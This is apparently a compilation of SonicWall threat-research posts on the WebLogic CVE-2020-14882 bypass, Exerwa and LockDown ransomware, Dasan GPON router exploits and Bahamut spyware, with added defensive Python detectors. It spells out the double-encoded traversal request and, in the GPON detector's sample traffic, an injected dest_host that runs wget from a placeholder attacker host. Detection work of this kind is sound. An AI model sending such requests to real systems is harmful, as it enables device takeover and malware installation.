
CVE-2020-14882 Oracle WebLogic Remote Code Execution Vulnerability Exploited in the Wild

The SonicWall Capture Labs Threat Research team has observed the recent remote code execution vulnerability reported in Oracle WebLogic Server being exploited in the wild. This vulnerability is due to improper sanitization of user-supplied data sent via HTTP.

Oracle WebLogic is a widely used Java application server. It helps build and deploy distributed web applications for large enterprises.

Vulnerability | CVE-2020-14882

A remote code execution vulnerability exists in Oracle WebLogic Server. The vulnerability is due to improper validation of user-supplied data in the com.bea.console.utils.MBeanUtilsInitSingleFileServlet and com.bea.console.handles.HandleFactory classes.

The vulnerable class com.bea.console.handles.HandleFactory can be triggered using an HTTP request with the following structure:

http://<target>/console/console.portal?_nfpb=true&_pageLabel=HomePage1&handle=<class_name>

MBeanUtilsInitSingleFileServlet does not implement a proper mechanism to filter out the directory traversal sequence “..”, nor does it check whether the user is authenticated. As a consequence, an attacker can request “/console/css/%252E%252E%252Fconsole.portal”, where “%252E%252E%252F” is the double-URL-encoded form of “../”, to bypass authentication, and supply a request parameter named “handle” whose value is the name of a class that may be used maliciously and will be instantiated by the com.bea.console.handles.HandleFactory class.

This exploit allows an unauthenticated attacker to achieve remote code execution on a vulnerable Oracle WebLogic Server by sending a crafted HTTP GET request. Successful exploitation results in the execution of arbitrary code under the security context of the user running WebLogic Server.
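The request pattern above can only be recognised, whether by a server-side filter or by an access-log analyser, if the path is canonicalised before it is checked. The following Python script is an added example, not SonicWall's or Oracle's code: it percent-decodes a path until it stops changing, collapses the resulting “..” segments, and flags a request that enters through the unauthenticated /console/css/ tree but resolves elsewhere while carrying a handle parameter. The request lines and the PLACEHOLDER_CLASS value are constructed; the only assumption is that the server interprets the path after every layer of encoding is removed, which is what the double encoding is designed to exploit.

```python
# Added example (not SonicWall's or Oracle's code): canonicalise a request path the
# way a defender-side filter or log analyser should, and flag requests matching the
# CVE-2020-14882 pattern. All request lines below are constructed samples.
import posixpath
from urllib.parse import parse_qs, unquote, urlsplit


def fully_decode(value: str, max_rounds: int = 5) -> str:
    """Percent-decode until the value stops changing.

    "%252E" -> "%2E" -> "." takes two rounds; a filter that looks for ".." in the
    raw path never sees it, which is the point of the double encoding.
    """
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def canonical_path(raw_path: str) -> str:
    """Decode repeatedly, then collapse "." and ".." segments."""
    return posixpath.normpath(fully_decode(raw_path))


def naive_traversal_check(raw_path: str) -> bool:
    """The check that fails: it looks for '..' in the still-encoded path."""
    return ".." in raw_path


def classify_request(request_line: str) -> dict:
    """Break down one request line of the form "GET /path?query HTTP/1.1".

    traversal_bypass: the request enters through /console/css/ but canonicalises
    to a path outside that tree (e.g. /console/console.portal).
    has_handle: a 'handle' parameter is present (its value is what HandleFactory
    would instantiate).
    """
    method, target, _version = request_line.split(" ", 2)
    parts = urlsplit(target)
    decoded_path = fully_decode(parts.path)
    canon = posixpath.normpath(decoded_path)
    # Decode the query first so an encoded parameter name is still matched.
    params = parse_qs(fully_decode(parts.query), keep_blank_values=True)

    entered_via_css = decoded_path.startswith("/console/css/")
    traversal_bypass = entered_via_css and not canon.startswith("/console/css/")
    has_handle = any(name.lower() == "handle" for name in params)
    return {
        "method": method,
        "canonical_path": canon,
        "traversal_bypass": traversal_bypass,
        "has_handle": has_handle,
        "suspicious": traversal_bypass and has_handle,
    }


# Constructed sample request lines; PLACEHOLDER_CLASS stands in for the <class_name>
# value in the request structure above.
SAMPLE_REQUESTS = [
    "GET /console/console.portal?_nfpb=true&_pageLabel=HomePage1 HTTP/1.1",
    "GET /console/css/console.css HTTP/1.1",
    "GET /console/css/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=PLACEHOLDER_CLASS HTTP/1.1",
]


def scan(request_lines):
    """Return the request lines that match the exploit pattern."""
    return [line for line in request_lines if classify_request(line)["suspicious"]]


if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        info = classify_request(line)
        tag = "ALERT" if info["suspicious"] else "ok   "
        print(tag, info["canonical_path"], line)
```

naive_traversal_check is included only to show what a filter applied before decoding sees: nothing. In a production analyser, feed it the parsed path and query from your access-log format rather than a raw request line.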

Exploit Requests

The following exploits are currently being used:

http://x.x.x.x:7001

Trend Chart:

SonicWall Capture Labs Threat Research team provides protection against this exploit with the following signatures:

IPS: 14003 Oracle WebLogic Server Remote Command Execution 3
IPS: 15218 Oracle WebLogic Server Remote Command Execution 2

Exerwa ransomware leaked from CTF hacker event

The SonicWall Capture Labs threat research team has observed reports of Hungarian PC users infected by Exerwa ransomware. Exerwa is reported to be CTF malware that emerged from a Capture-the-Flag event in which hackers were tasked with building functional ransomware in the shortest possible time. Unfortunately, some code from this event has ended up in the wild. The code is very basic, and the initial infection vector is a Word document using macros.

Infection Cycle:

Upon opening the Word document the following page is shown:

A .bat script can be seen on the second page:

Once the macro has run, the following files are dropped on to the system:

  • %USERPROFILE%\Exerwa\decode.bat
  • %USERPROFILE%\Exerwa\exec.enc
  • %USERPROFILE%\Exerwa\script.enc
  • %USERPROFILE%\Exerwa\exec.exe
  • %USERPROFILE%\Exerwa\script.ps1

script.enc contains the following encrypted data:

exec.enc contains the following encrypted data:

decode.bat is run. It contains the following commands:

exec.enc is decrypted using the built-in Windows certutil program and exec.exe is created. It is a non-malicious, generic XOR encryption tool by Luigi Auriemma:

script.enc is decrypted with certutil and script.ps1 is created. It contains the following PowerShell script:

This script contains a loop that encrypts files within a given directory using the XOR tool. As shown in the script, “.exerwa” is appended to the names of encrypted files.
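Because the encryption is done by a generic XOR tool driven by a very basic script, the first question for a defender is whether affected files can be recovered without the key. The Python below is an added example, not code from the ransomware, the XOR tool or SonicWall. It assumes the tool applies a repeating byte key to each file, which the post does not confirm, and that the original file begins with a known header (the PNG signature is used). Under those assumptions the XOR of ciphertext and known header is the key stream, and the script recovers the key, decrypts a constructed sample file, and strips the “.exerwa” suffix.

```python
# Added example (not the ransomware's, the XOR tool's or SonicWall's code). Assumes a
# repeating-key byte-wise XOR, which the post does not state; the key and the
# PNG-like sample file below are constructed for illustration.
from typing import Optional

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"  # first 8 bytes of every PNG file


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; applying it twice with the same key restores the input."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def recover_key(ciphertext: bytes, known_prefix: bytes, max_key_len: int = 64) -> Optional[bytes]:
    """Derive the key from a ciphertext whose original first bytes are known.

    ciphertext XOR known plaintext gives the key stream over the prefix; the
    shortest period that reproduces the whole stream is taken as the key.
    """
    stream = bytes(c ^ p for c, p in zip(ciphertext, known_prefix))
    # A period is only accepted when at least one byte beyond it confirms it, so a
    # key as long as the known prefix (or longer) cannot be recovered from it.
    limit = min(max_key_len, len(stream) - 1)
    for klen in range(1, limit + 1):
        candidate = stream[:klen]
        if all(stream[i] == candidate[i % klen] for i in range(len(stream))):
            return candidate
    return None


def decrypt_file(ciphertext: bytes, known_prefix: bytes) -> Optional[bytes]:
    """Recover the key from the header and decrypt the whole file, or None."""
    key = recover_key(ciphertext, known_prefix)
    if key is None:
        return None
    plaintext = xor_bytes(ciphertext, key)
    return plaintext if plaintext.startswith(known_prefix) else None


def original_name(filename: str) -> str:
    """Strip the '.exerwa' suffix the script appends to encrypted files."""
    suffix = ".exerwa"
    return filename[:-len(suffix)] if filename.endswith(suffix) else filename


# Constructed sample: a PNG-like file and a 5-byte key (not values from the campaign)
SAMPLE_KEY = b"\x5a\x13\xc7\x08\x91"
SAMPLE_PLAINTEXT = PNG_SIGNATURE + b"\x00\x00\x00\rIHDR" + bytes(range(40))
SAMPLE_CIPHERTEXT = xor_bytes(SAMPLE_PLAINTEXT, SAMPLE_KEY)

if __name__ == "__main__":
    print("recovered key:", recover_key(SAMPLE_CIPHERTEXT, PNG_SIGNATURE))
    print("round trip ok:", decrypt_file(SAMPLE_CIPHERTEXT, PNG_SIGNATURE) == SAMPLE_PLAINTEXT)
    print(original_name("holiday.png.exerwa"))
```

The approach only works when the key is shorter than the known header; a longer repeating key needs a longer known plaintext (for example a file that also exists unencrypted in a backup), and a tool that derives a per-file key or uses a stream cipher would not be recoverable this way at all.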


SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: Exerwa.RSM (Trojan)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.

LockDown ransomware actively spreading in the wild

The SonicWall Capture Labs Threat Research team observed reports of a new variant family of LOCKDOWN ransomware actively spreading in the wild.

The LOCKDOWN ransomware encrypts the victim’s files with a strong encryption algorithm until the victim pays a fee to get them back.

Infection Cycle:

The ransomware adds the following files to the system:

  • Malware.exe
    • %App.path%\ [Name]. <LOCKDOWN >
    • %App.path%\ [Name]. <bondy>
    • %App.path%\ [Name]. <Connect>
    • %App.path%\ [Name]. <sext>

Once the computer is compromised, the ransomware runs the following commands: (Actual Source code)

When LOCKDOWN is started it creates and assigns a unique ID number to the victim, then scans all local drives for data files to encrypt.

When encrypting files it will use the AES encryption algorithm and only encrypt those files that match the following extensions:

The ransomware encrypts all the files and appends the [LOCKDOWN] extension onto each encrypted file’s filename.

After encrypting all personal documents, the ransomware shows the following picture containing a message reporting that the computer has been encrypted and to contact its developer for unlock instructions.

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: Blackheart.RSM (Trojan)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Cybersecurity News & Trends – 11-20-20

This week hackers targeted hardware and software, with attacks on WordPress sites, printers, CPUs and the popular game “Among Us” making headlines.


SonicWall in the News

SonicWall Stresses Zero Trust, Zero Touch in 2020 — ChannelPro Network

  • A look at SonicWall’s business strategy in 2020, particularly SonicWall’s Cloud Edge solution, its Boundless 2020 virtual event, and commentary from Bill Conner and Dmitriy Ayrapetov.

Best Firewalls For Small Businesses — Business Pundit

  • Business Pundit has recognized SonicWall’s TZ firewall as the “Best Overall Firewall.”

SonicWall Refreshes Low Ends of TZ and NSa Firewall Portfolios and Unveils Zero Trust SonicWall Cloud Edge Secure Access — ChannelBuzz

  • SonicWall adds Cloud Edge Secure Access solution and new TZ and NSa firewalls to its lineup.

Firewalls And ZTNA Solution Protect Working Environments — LANline

  • LANline offers a closer look at SonicWall’s new NSFirewalls and ZTNA solution news.

SonicWall Expands Cybersecurity with New TCO Firewalls — APN News

  • SonicWall announced the expansion of its Capture Cloud Platform with the addition of the high-performance NSa 2700 firewall, three new cost-effective TZ firewall options and SASE offering debut.

Industry News

The 10 Coolest Cybersecurity Startups Of 2020 — CRN

  • Perimeter 81, who teamed up with SonicWall to create the Cloud Edge Secure Access solution, made CRN’s list of Coolest Cybersecurity Startups of 2020.

Cybersecurity Industry in Detroit Is Growing and Mentors Are Starting With Young People — Detroit Free Press

  • In an article on how Detroit’s cybersecurity industry is growing, Bill Conner offers cybersecurity tips for remote work.

Egregor ransomware bombards victims’ printers with ransom notes — Threatpost

  • The Egregor ransomware uses a novel approach to get a victim’s attention after an attack: it shoots ransom notes from all available printers.

Bitcoin hits nearly three-year peak, homes in on record — Reuters

  • Bitcoin has soared to its highest level since December 2017 as the asset’s perceived quality as a hedge against inflation lured institutional and retail demand.

Trump fires CISA chief Chris Krebs, who guarded the 2020 election from interference and domestic misinformation — Cyberscoop

  • President Donald Trump on Tuesday said he had fired Chris Krebs, a widely respected Department of Homeland Security official who helped protect the 2020 election from hacking and disinformation, the latest in a series of purges.

Forget Imposters. Among Us Is a Playground for Hackers — Wired

  • James Sebree, a researcher for security firm Tenable, on Tuesday published a blog post laying out a slew of relatively simple, hackable vulnerabilities in Among Us.

Hackers are actively probing millions of WordPress sites — Bleeping Computer

  • Unknown threat actors are scanning for WordPress websites with Epsilon Framework themes installed on over 150,000 sites and vulnerable to Function Injection attacks that could lead to full site takeovers.

Ransomware Operator Promotes Distributed Storage for Stolen Data — Dark Reading

  • The criminals behind the DarkSide ransomware-as-a-service operation say the system will be harder to take down.

Hackers can use just-fixed Intel bugs to install malicious firmware on PCs — Ars Technica

  • Vulnerabilities allowed hackers with physical access to override a protection Intel built into modern CPUs that prevents unauthorized firmware from running during the boot process. Known as Boot Guard, the measure is designed to anchor a chain of trust directly into the silicon to ensure that all firmware that loads is digitally signed by the computer manufacturer.

In Case You Missed It

Attackers actively targeting vulnerable Dasan GPON home routers

The SonicWall Capture Labs threat research team observed attacks exploiting old vulnerabilities in Dasan GPON home routers. DASAN Zhone Solutions is a provider of network access solutions for service provider and enterprise networks. The company provides a wide array of reliable, cost-effective networking technologies—including broadband access, Ethernet switching, Passive Optical LAN and software-defined networks.

Attackers are targeting the following two vulnerabilities in GPON home routers:

Authentication Bypass Vulnerability
It is possible to bypass authentication simply by appending “?images” to any URL of the device that requires authentication, for example via the /menu.html?images/ or /GponForm/diag_FORM?images/ URI. The attacker can then manage the device. (CVE-2018-10561)

Command Injection Vulnerability
A command injection vulnerability exists in Dasan GPON home routers via the dest_host parameter in a diag_action=ping request to the GponForm/diag_Form URI. The router saves the ping results in the tmp directory and displays them when the user visits diag.html. This can be used to inject and execute commands. (CVE-2018-10562)

The following exploit was spotted in the wild:

The attacker takes advantage of the above vulnerabilities to bypass authentication by appending “?images” to the POST request. The attacker then downloads a malicious executable by injecting a “wget” command. The file is saved in the tmp directory and is executed when a user visits the diag.html page.
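Both GPON issues leave a visible trace in the request itself: a “?images” query string on a page that normally requires a login, and a dest_host value that is not a hostname or IP address. The Python below is an added example, not SonicWall's signature logic or the vendor's code; it applies those two checks to constructed request records (attacker.invalid is a placeholder host) and also shows the allow-list check a ping form should have applied to dest_host before building a command.

```python
# Added example (not SonicWall's or the vendor's code): flag requests matching the
# two Dasan GPON issues above. Request records and the host attacker.invalid are
# constructed for illustration.
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Hostname labels or dotted-IPv4 octets joined by dots; nothing else is a ping target.
_HOST_RE = re.compile(
    r"^[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)
_IMAGES_BYPASS = re.compile(r"^images(?:/|$)")


def is_valid_ping_target(value: str) -> bool:
    """Allow-list check a ping form must apply before the value reaches a shell."""
    return 0 < len(value) <= 253 and _HOST_RE.match(value) is not None


def analyse_request(method: str, target: str, body: str = "") -> dict:
    """Check one request for the two GPON exploit patterns."""
    parts = urlsplit(target)
    path = unquote(parts.path)

    # CVE-2018-10561: "?images" (or "?images/") appended to a page that needs a login
    auth_bypass = _IMAGES_BYPASS.match(parts.query) is not None

    # CVE-2018-10562: diag_action=ping to GponForm/diag_Form with a dest_host that is
    # not a plain hostname/IP (shell metacharacters, an embedded wget, ...)
    params = parse_qs(body if method.upper() == "POST" else parts.query,
                      keep_blank_values=True)
    is_diag_form = path.lower() == "/gponform/diag_form"
    is_ping = params.get("diag_action", [""])[0] == "ping"
    dest_hosts = params.get("dest_host", [])
    command_injection = (is_diag_form and is_ping
                         and any(not is_valid_ping_target(v) for v in dest_hosts))

    return {
        "method": method,
        "path": path,
        "auth_bypass": auth_bypass,
        "command_injection": command_injection,
        "flagged": auth_bypass or command_injection,
    }


def scan(records):
    """Run analyse_request over (method, target, body) tuples."""
    return [analyse_request(*rec) for rec in records]


# Constructed sample traffic: two ordinary requests, then the two exploit patterns
SAMPLE_REQUESTS = [
    ("GET", "/menu.html", ""),
    ("POST", "/GponForm/diag_Form", "diag_action=ping&dest_host=192.0.2.1"),
    ("GET", "/menu.html?images/", ""),
    ("POST", "/GponForm/diag_Form?images/",
     "diag_action=ping&dest_host=%3Bwget+http%3A%2F%2Fattacker.invalid%2Fbot%3B"),
]

if __name__ == "__main__":
    for rec, result in zip(SAMPLE_REQUESTS, scan(SAMPLE_REQUESTS)):
        tag = "ALERT" if result["flagged"] else "ok   "
        print(tag, rec[0], rec[1],
              "auth_bypass=%s injection=%s" % (result["auth_bypass"], result["command_injection"]))
```

The allow-list in is_valid_ping_target accepts only hostname characters and dotted IPv4; rejecting everything else is simpler and safer than trying to enumerate shell metacharacters, which is why the detector reuses it instead of a blocklist.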

SonicWall Capture Labs provides protection against this threat via the following signatures:

    • IPS 13340: Dasan GPON Routers Command Injection
    • GAV: Mirai.H

Threat Graph

IoCs:
59.99.45.126
117.213.46.186
117.194.165.174
112.27.124.174
42.234.109.14
2e4506802aedea2e6d53910dfb296323be6620ac08c4b799a879eace5923a7b6

A quick look at Shodan reveals thousands of vulnerable devices

Cybersecurity News & Trends – 11-13-20

This week, SonicWall expanded its Capture Cloud Platform with four new firewalls and a new Zero-Trust security solution.


SonicWall in the News

SonicWall Expands Boundless Cybersecurity With New High-Performance, Low-TCO Firewalls; Company Debuts Cloud-Native ZTNA Solution to Secure Work-From-Anywhere Environments — Company Press Release

  • SonicWall today announced the expansion of its Capture Cloud Platform with the addition of the high-performance NSa 2700 firewall, three new TZ firewall options, and SonicWall Cloud Edge Secure Access, which delivers easy-to-deploy, easy-to-use zero-trust security.

SonicWall Capture Advanced Threat Protection Collects ICSA Labs Certification — Company Press Release

  • For the third consecutive quarter, cloud-based Capture Advanced Threat Protection (ATP) sandbox service has been vigorously tested in the detection of today’s most evasive threats and awarded the coveted ICSA Labs Advanced Threat Defense certification.

The 2020 Tech Innovators Awards — CRN

  • SonicWall was recognized as the winner of the networking category for its TZ570 and TZ670 series (slide 22) and was a finalist in the security network category for its Network Security Services Platform 15700 (slide 37).

Cybersecurity Industry in Detroit Is Growing and Mentors Are Starting With Young People — Detroit Free Press

  • In an article on how Detroit’s cybersecurity industry is growing, Bill Conner offers cybersecurity tips for more secure remote work.

Four New SonicWall Firewalls Announced — Storage Review

  • Storage Review covers SonicWall’s latest launch, focusing on Cloud Edge Secure Access and four all-new firewalls.

SonicWall Research: Ransomware, IoT Malware Attacks On The Rise — MSSP Alert

  • In a feature article on SonicWall’s Q3 Threat Data, MSSP Alert spotlights the surge in ransomware and IoT malware.

Industry News

Campari Site Suffers Ransomware Hangover — ThreatPost

  • Italian spirits brand Campari has restored its company website following a recent ransomware attack.

Ragnar Locker Ransomware Gang Takes Out Facebook Ads in Key New Tactic — Threat Post

  • Following the Nov. 3 ransomware attack against Campari, Ragnar Locker group took out public Facebook ads threatening to release stolen data.

Pressure grows to reinstall White House cyber czar — The Hill

  • Pressure to reinstate a cyber czar within the White House is growing, with bipartisan allies lining up on Capitol Hill to push such a proposal.

Zoom settles charges with FTC over deceptive security practices — Cyberscoop

  • The FTC has reached a deal with Zoom to settle allegations that the communications technology company misrepresented its security and privacy protections.

How to Avoid Paying Ransomware Ransoms — Data Center Knowledge

  • As private experts and government officials advise against indulging the bad guys, here are some tips for following that advice.

Treasury Asks if External Cyber Acts Qualify for Terrorism Risk Insurance Program — Nextgov

  • A request for comment reflects recommendations made by the Cyberspace Solarium Commission.

Major ransomware strain jumps from Windows to Linux — SC Magazine

  • A recently discovered file-encrypting Trojan, built as an executable and linkable format (ELF), encrypts data on machines controlled by Linux-based operating systems.

Hospital network hit by cyber attack restoring services — The Washington Times

  • Computer experts at the University of Vermont Medical Center are working to restore systems disabled in a cyberattack that has affected the hospital’s ability to provide some cancer treatments.

Vietnamese hacking group OceanLotus uses imitation news sites to spread malware — Cyberscoop

  • Suspected Vietnamese government-linked hackers are behind a series of fake news websites and Facebook pages meant to target victims with malicious software.

Microsoft Exchange Attack Exposes New xHunt Backdoors — Threat Post

  • An attack on the Microsoft Exchange server of an organization in Kuwait revealed two never-before-seen PowerShell backdoors.

U.S. seizes over $1 billion in bitcoin tied to ‘Silk Road’ — Reuters

  • The U.S. Justice Department announced it had seized over $1 billion worth of bitcoin associated with the underground online marketplace Silk Road.

Ransomware Attacks Surge 40% Globally In Q3: Report — Express Computer

  • While overall malware volume declined for the third consecutive quarter, ransomware attacks globally surged 40% to reach 199.7 million hits in the third quarter of this year.

In Case You Missed It

Android spyware Bahamut spreads disguised as Voice of Islam app

A spy campaign targeting Android was found spreading actively via the link – voiceofislam.info – which has since been taken down. The cached page for this link shows web links that led the user to download a malicious APK file:

Original page images, posted on Twitter:

Infection cycle

Upon installation and execution, the app does not appear to do much from the user’s point of view. In the background it contacts the attacker with the device IMEI; this might be the registration mechanism usually observed in Android malware:

Contacts stored on the device are siphoned back to the attacker:

Spyware capabilities

This application contains a number of spyware components that aim at extracting sensitive user-related information and sending it back to the attacker’s server – voiceofislam.info

Call logs:

Contacts:

Device information:

Media files with support for a number of extensions:

Interestingly, the spyware supports the .crypt11 and .crypt12 file extensions, which are encrypted WhatsApp chat history databases.

Location:

String encryption

This malware uses Blowfish encryption to encrypt strings using the key “9;_R%@c`gZxL9M{j”. This key has been linked with the Android spyware campaign Bahamut.

Network investigation

We observed the following VT graph for the domain voiceofislam.info:

The second malicious app identified from this graph – 6ef7ea19a000f2570c30ae3814b8482f – contains functionality similar to that of the app analyzed.

Upon further digging, we found another app related to this campaign via Koodous:

This app (MD5 – 9368dd657e410f8a9ba2b71c95cc0777) has a code and component structure similar to the previous app, with one minor change: it uses the secret key K&M9B#)O/R\u0007=P%hA, which again coincides with the known keys associated with the Bahamut campaign.

Overall, this spyware aims at stealing sensitive user information from infected devices. The malware is part of the larger Bahamut campaign, and we can expect more spyware from this campaign to spread by different means in the future.

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • GAV: AndroidOSBahamut.NS (Trojan)
  • GAV: AndroidOSBahamut.SM (Trojan)

Indicators of Compromise (IOC):

Microsoft Security Bulletin Coverage for November 2020

The SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of November 2020. A list of the issues reported, along with SonicWall coverage information, is as follows:

CVE-2020-16998 DirectX Elevation of Privilege Vulnerability
ASPY 5907:Malformed-File exe.MP.131

CVE-2020-17010 Win32k Elevation of Privilege Vulnerability
ASPY 125:Malformed-File exe.MP.165
CVE-2020-17038 Win32k Elevation of Privilege Vulnerability
ASPY 124:Malformed-File exe.MP.164

CVE-2020-17047 Windows Network File System Denial of Service Vulnerability
IPS 15220:Windows Network File System Denial of Service (CVE-2020-17047)

CVE-2020-17051 Windows Network File System Remote Code Execution Vulnerability
IPS 15223:Windows Network File System Remote Code Execution (CVE-2020-17051)

CVE-2020-17052 Scripting Engine Memory Corruption Vulnerability
IPS 15221:Scripting Engine Memory Corruption Vulnerability (CVE-2020-17052)

CVE-2020-17053 Internet Explorer Memory Corruption Vulnerability
IPS 15222:Internet Explorer Memory Corruption Vulnerability (CVE-2020-17053)

CVE-2020-17056 Windows Network File System Information Disclosure Vulnerability
IPS 15226:Windows NFS Information Disclosure (CVE-2020-17056)

CVE-2020-17057 Windows Win32k Elevation of Privilege Vulnerability
ASPY 123:Malformed-File exe.MP.161

CVE-2020-17061 Microsoft SharePoint Remote Code Execution Vulnerability
ASPY 126:Malformed-File exe.MP.166
IPS 15224: Microsoft SharePoint Remote Code Execution (CVE-2020-17061) 1
IPS 15225: Microsoft SharePoint Remote Code Execution (CVE-2020-17061) 2

CVE-2020-17087 Windows Kernel Local Elevation of Privilege Vulnerability
ASPY 117:Malformed-File exe.OT.1
GAV:CVE-2020-17087

CVE-2020-17088 Windows Common Log File System Driver Elevation of Privilege Vulnerability
ASPY 122:Malformed-File exe.MP.160

The following vulnerabilities do not have exploits in the wild:
CVE-2020-1325 Azure DevOps Server and Team Foundation Services Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2020-1599 Windows Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2020-16970 Azure Sphere Unsigned Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-16979 Microsoft SharePoint Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-16981 Azure Sphere Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-16982 Azure Sphere Unsigned Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-16983 Azure Sphere Tampering Vulnerability
There are no known exploits in the wild.
CVE-2020-16984 Azure Sphere Unsigned Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-16985 Azure Sphere Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-16986 Azure Sphere Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2020-16987 Azure Sphere Unsigned Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-16988 Azure Sphere Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-16989 Azure Sphere Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-16990 Azure Sphere Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-16991 Azure Sphere Unsigned Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-16992 Azure Sphere Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-16993 Azure Sphere Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-16994 Azure Sphere Unsigned Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-16997 Remote Desktop Protocol Server Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-16999 Windows WalletService Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-17000 Remote Desktop Protocol Client Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-17001 Windows Print Spooler Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17004 Windows Graphics Component Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-17005 Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability
There are no known exploits in the wild.
CVE-2020-17006 Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability
There are no known exploits in the wild.
CVE-2020-17007 Windows Error Reporting Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17011 Windows Port Class Library Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17012 Windows Bind Filter Driver Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17013 Win32k Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-17014 Windows Print Spooler Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17015 Microsoft SharePoint Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2020-17016 Microsoft SharePoint Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2020-17017 Microsoft SharePoint Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-17018 Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability
There are no known exploits in the wild.
CVE-2020-17019 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17020 Microsoft Word Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2020-17021 Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability
There are no known exploits in the wild.
CVE-2020-17024 Windows Client Side Rendering Print Provider Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17025 Windows Remote Access Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17026 Windows Remote Access Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17027 Windows Remote Access Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17028 Windows Remote Access Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17029 Windows Canonical Display Driver Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-17030 Windows MSCTF Server Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-17031 Windows Remote Access Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17032 Windows Remote Access Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17033 Windows Remote Access Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17034 Windows Remote Access Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17035 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17036 Windows Function Discovery SSDP Provider Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-17037 Windows WalletService Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17040 Windows Hyper-V Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2020-17041 Windows Print Configuration Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17042 Windows Print Spooler Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17043 Windows Remote Access Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17044 Windows Remote Access Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17045 Windows KernelStream Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-17046 Windows Error Reporting Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2020-17048 Chakra Scripting Engine Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2020-17049 Kerberos Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2020-17054 Chakra Scripting Engine Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2020-17055 Windows Remote Access Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17058 Microsoft Browser Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2020-17060 Microsoft SharePoint Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2020-17062 Microsoft Office Access Connectivity Engine Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17063 Microsoft Office Online Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2020-17064 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17065 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
